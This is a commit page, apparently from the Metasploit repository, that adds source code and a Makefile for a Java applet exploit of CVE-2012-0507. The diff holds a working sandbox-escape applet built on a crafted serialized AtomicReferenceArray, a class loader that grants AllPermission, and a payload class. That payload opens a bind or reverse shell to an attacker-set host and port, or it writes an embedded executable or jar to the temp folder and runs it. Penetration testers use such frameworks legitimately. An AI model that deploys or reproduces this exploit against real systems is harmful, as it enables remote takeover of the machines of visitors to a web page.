-
Notifications
You must be signed in to change notification settings - Fork 13.9k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
- Loading branch information
Showing
5 changed files
with
530 additions
and
16 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,23 +1,15 @@ | ||
JAR = CVE-2012-0507.jar | ||
JAR_FILE = CVE-2012-0507.jar | ||
|
||
CLASSES = \ | ||
msf/x/Exploit.java \ | ||
msf/x/Help.java \ | ||
msf/x/PayloadX.java | ||
all: ${JAR_FILE} | ||
|
||
${JAR_FILE}: src/a/Exploit.java src/a/Help.java src/msf/x/PayloadX.java | ||
javac -d bin -target 1.2 -source 1.2 src/a/*.java src/msf/x/*.java && (cd bin; jar cvf ../${JAR_FILE} `find . -name *.class`) | ||
|
||
.SUFFIXES: .java .class | ||
.java.class: | ||
javac -d bin -source 1.2 -target 1.2 $*.java | ||
|
||
all: $(CLASSES:.java=.class) | ||
(cd bin; jar cvf ../$(JAR) *) | ||
|
||
install: | ||
mv $(JAR) ../../../../data/exploits/ | ||
install: all | ||
mv ${JAR_FILE} ../../../../data/exploits/ | ||
|
||
clean: | ||
rm -f $(JAR) | ||
rm -rf bin/* | ||
rm -f ${JAR_FILE} | ||
find bin -name '*.class' -print0 | xargs -0 rm -f | ||
|
||
|
191 changes: 191 additions & 0 deletions
191
external/source/exploits/CVE-2012-0507/bin/msf/x/PayloadX.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,191 @@ | ||
package msf.x; | ||
|
||
import java.io.BufferedReader; | ||
import java.io.BufferedWriter; | ||
import java.io.File; | ||
import java.io.FileOutputStream; | ||
import java.io.InputStream; | ||
import java.io.InputStreamReader; | ||
import java.io.OutputStream; | ||
import java.io.OutputStreamWriter; | ||
import java.net.ServerSocket; | ||
import java.net.Socket; | ||
import java.security.AccessController; | ||
import java.security.PrivilegedExceptionAction; | ||
|
||
public class PayloadX implements PrivilegedExceptionAction | ||
{ | ||
// This will contain a hex string of the native payload to drop and execute. | ||
public static String data = null; | ||
public static String jar = null; | ||
// If no native payload is set we get either a java bind shell or a java | ||
// reverse shell. | ||
public static String lhost = null; | ||
public static int lport = 4444; | ||
|
||
class StreamConnector extends Thread | ||
{ | ||
InputStream is; | ||
OutputStream os; | ||
|
||
StreamConnector( InputStream is, OutputStream os ) | ||
{ | ||
this.is = is; | ||
this.os = os; | ||
} | ||
|
||
public void run() | ||
{ | ||
BufferedReader in = null; | ||
BufferedWriter out = null; | ||
|
||
try | ||
{ | ||
in = new BufferedReader( new InputStreamReader( is ) ); | ||
out = new BufferedWriter( new OutputStreamWriter( os ) ); | ||
char buffer[] = new char[8192]; | ||
int length; | ||
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) | ||
{ | ||
out.write( buffer, 0, length ); | ||
out.flush(); | ||
} | ||
} | ||
catch( Exception e ) {} | ||
|
||
try | ||
{ | ||
if( in != null ) | ||
in.close(); | ||
if( out != null ) | ||
out.close(); | ||
} | ||
catch( Exception e ) {} | ||
} | ||
} | ||
|
||
// http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java | ||
public static byte[] StringToBytes( String s ) | ||
{ | ||
byte[] data = new byte[s.length() / 2]; | ||
|
||
for( int i = 0 ; i < s.length() ; i += 2 ) | ||
data[i / 2] = (byte)( ( Character.digit( s.charAt( i ), 16 ) << 4 ) + Character.digit( s.charAt( i + 1 ), 16 ) ); | ||
|
||
return data; | ||
} | ||
|
||
public Object run() throws Exception | ||
{ | ||
//System.out.println("Running"); | ||
// if the native payload data has not been set just return for now, it | ||
// will be set by the next time we reach here. | ||
if( PayloadX.data == null && PayloadX.jar == null ) | ||
return null; | ||
//System.out.println("have either data or jar"); | ||
|
||
try | ||
{ | ||
String os = System.getProperty( "os.name" ); | ||
|
||
//System.out.println("OS: " + os); | ||
// if we have no native payload to drop and execute we default to | ||
// either a TCP bind or reverse shell. | ||
if( PayloadX.data.length() == 0 && PayloadX.jar.length() == 0 ) | ||
{ | ||
//System.out.println("no, exe/jar. Doing shell"); | ||
Socket client_socket = null; | ||
|
||
String shell = "/bin/sh"; | ||
|
||
if( os.indexOf( "Windows" ) >= 0 ) | ||
shell = "cmd.exe"; | ||
|
||
if( PayloadX.lhost == null ) | ||
{ | ||
ServerSocket server_socket = new ServerSocket( PayloadX.lport ); | ||
client_socket = server_socket.accept(); | ||
} | ||
else | ||
{ | ||
client_socket = new Socket( PayloadX.lhost, PayloadX.lport ); | ||
} | ||
|
||
if( client_socket != null ) | ||
{ | ||
Process process = exec( shell ); | ||
if( process != null ) | ||
{ | ||
( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start(); | ||
( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start(); | ||
} | ||
} | ||
} | ||
else if( PayloadX.jar != null && (PayloadX.jar.length() != 0) ) | ||
{ | ||
//System.out.println("Dropping JAR"); | ||
String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".jar"; | ||
|
||
writeFile( path, StringToBytes( PayloadX.jar ) ); | ||
exec( "java -jar " + path + " " + PayloadX.lhost + " " + PayloadX.lport + " true"); | ||
} | ||
else | ||
{ | ||
//System.out.println("Dropping EXE"); | ||
String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".exe"; | ||
|
||
writeFile( path, StringToBytes( PayloadX.data ) ); | ||
if( os.indexOf( "Windows" ) < 0 ) | ||
{ | ||
exec( "chmod 755 " + path ); | ||
} | ||
exec( path ); | ||
new File( path ).delete(); | ||
} | ||
} | ||
catch( Exception e ) { | ||
//System.out.println(e); | ||
} | ||
|
||
return null; | ||
} | ||
|
||
public Process exec( String path ) | ||
{ | ||
Process p = null; | ||
//System.out.println( "Executing" ); | ||
try { | ||
p = Runtime.getRuntime().exec( path ); | ||
if( p == null ) | ||
{ | ||
//System.out.println( "Null process, crap" ); | ||
} | ||
p.waitFor(); | ||
} catch( Exception e ) { | ||
//System.out.println(e); | ||
} | ||
return p; | ||
} | ||
|
||
public void writeFile( String path, byte[] data ) | ||
{ | ||
//System.out.println( "Writing file" ); | ||
try { | ||
FileOutputStream fos = new FileOutputStream( path ); | ||
|
||
fos.write( data ); | ||
fos.close(); | ||
} catch( Exception e ) { | ||
//System.out.println(e); | ||
} | ||
} | ||
|
||
public PayloadX() | ||
{ | ||
try | ||
{ | ||
AccessController.doPrivileged( this ); | ||
} | ||
catch( Exception e ) {} | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,58 @@ | ||
package a; | ||
|
||
import java.applet.Applet; | ||
import java.io.ByteArrayInputStream; | ||
import java.io.ObjectInputStream; | ||
import java.util.concurrent.atomic.AtomicReferenceArray; | ||
import a.*; | ||
|
||
// Referenced classes of package a: | ||
// Help | ||
|
||
public class Exploit extends Applet | ||
{ | ||
|
||
public Exploit() | ||
{ | ||
} | ||
|
||
public static byte[] StringToBytes(String s) | ||
{ | ||
byte abyte0[] = new byte[s.length() / 2]; | ||
for(int i = 0; i < s.length(); i += 2) | ||
abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16)); | ||
|
||
return abyte0; | ||
} | ||
|
||
public void init() | ||
{ | ||
try | ||
{ | ||
String as[] = { | ||
"ACED0005757200135B4C6A6176612E6C616E672E4F62", "6A6563743B90CE589F1073296C020000787000000002", "757200095B4C612E48656C703BFE2C941188B6E5FF02", "000078700000000170737200306A6176612E7574696C", "2E636F6E63757272656E742E61746F6D69632E41746F", "6D69635265666572656E63654172726179A9D2DEA1BE", "65600C0200015B000561727261797400135B4C6A6176", "612F6C616E672F4F626A6563743B787071007E0003" | ||
}; | ||
StringBuilder stringbuilder = new StringBuilder(); | ||
for(int i = 0; i < as.length; i++) | ||
stringbuilder.append(as[i]); | ||
|
||
ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(StringToBytes(stringbuilder.toString()))); | ||
Object aobj[] = (Object[])(Object[])objectinputstream.readObject(); | ||
Help ahelp[] = (Help[])(Help[])aobj[0]; | ||
AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray)aobj[1]; | ||
ClassLoader classloader = getClass().getClassLoader(); | ||
atomicreferencearray.set(0, classloader); | ||
Help _tmp = ahelp[0]; | ||
|
||
String data = getParameter( "data" ); | ||
String jar = getParameter( "jar" ); | ||
String lhost = getParameter( "lhost" ); | ||
String lport = getParameter( "lport" ); | ||
System.out.println("go go go"); | ||
Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) )); | ||
} | ||
catch(Exception exception) { | ||
System.out.println(exception.getMessage()); | ||
} | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,82 @@ | ||
package a; | ||
|
||
import java.io.ByteArrayOutputStream; | ||
import java.io.IOException; | ||
import java.io.InputStream; | ||
import java.io.ObjectInputStream; | ||
import java.io.ObjectOutputStream; | ||
import java.io.Serializable; | ||
import java.net.URL; | ||
import java.security.AllPermission; | ||
import java.security.CodeSource; | ||
import java.security.Permissions; | ||
import java.security.ProtectionDomain; | ||
import java.security.cert.Certificate; | ||
import java.lang.reflect.Field; | ||
|
||
public class Help extends ClassLoader implements Serializable{ | ||
public static void doWork(Help h, Exploit expl, String data, String jar, String lhost, int lport) { | ||
|
||
String classNames[] = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" }; | ||
String classPaths[] = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" }; | ||
Class cls = null; | ||
|
||
try | ||
{ | ||
for( int index=0 ; index<classNames.length ; index++ ) | ||
{ | ||
|
||
ByteArrayOutputStream bos = new ByteArrayOutputStream(); | ||
byte[] buffer = new byte[8192]; | ||
int length; | ||
|
||
// read in the class file from the jar | ||
InputStream is = expl.getClass().getResourceAsStream( classPaths[index] ); | ||
// and write it out to the byte array stream | ||
while( ( length = is.read( buffer ) ) > 0 ) | ||
bos.write( buffer, 0, length ); | ||
// convert it to a simple byte array | ||
buffer = bos.toByteArray(); | ||
|
||
URL url = new URL( "file:///" ); | ||
|
||
Certificate[] certs = new Certificate[0]; | ||
|
||
Permissions perm = new Permissions(); | ||
perm.add( new AllPermission() ); | ||
|
||
ProtectionDomain pd = new ProtectionDomain( new CodeSource( url, certs ), perm ); | ||
|
||
cls = h.defineClass( classNames[index], buffer, 0, buffer.length, pd ); | ||
Class class_cls = cls.getClass(); | ||
System.out.println("The type of the object is: " + class_cls.getName()); | ||
} | ||
|
||
// cls will end up being the PayloadX class | ||
if( cls != null ) | ||
{ | ||
// reflect into the PayloadX class to get these three fields | ||
Field payload_data = cls.getField( "data" ); | ||
Field payload_jar = cls.getField( "jar" ); | ||
Field payload_lhost = cls.getField( "lhost" ); | ||
Field payload_lport = cls.getField( "lport" ); | ||
|
||
// instantiate the PayloadX object once so as we can set the native payload data | ||
Object obj = cls.newInstance(); | ||
|
||
// set the native payload data, lhost and lport | ||
payload_data.set( obj, data ); | ||
payload_jar.set( obj, jar ); | ||
payload_lhost.set( obj, lhost ); | ||
payload_lport.setInt( obj, lport ); | ||
|
||
// instantiate a second PayloadX object to perform the actual payload | ||
obj = cls.newInstance(); | ||
} | ||
} | ||
catch( Exception e ) { | ||
System.out.println(e.getMessage()); | ||
} | ||
} | ||
} | ||
|
Oops, something went wrong.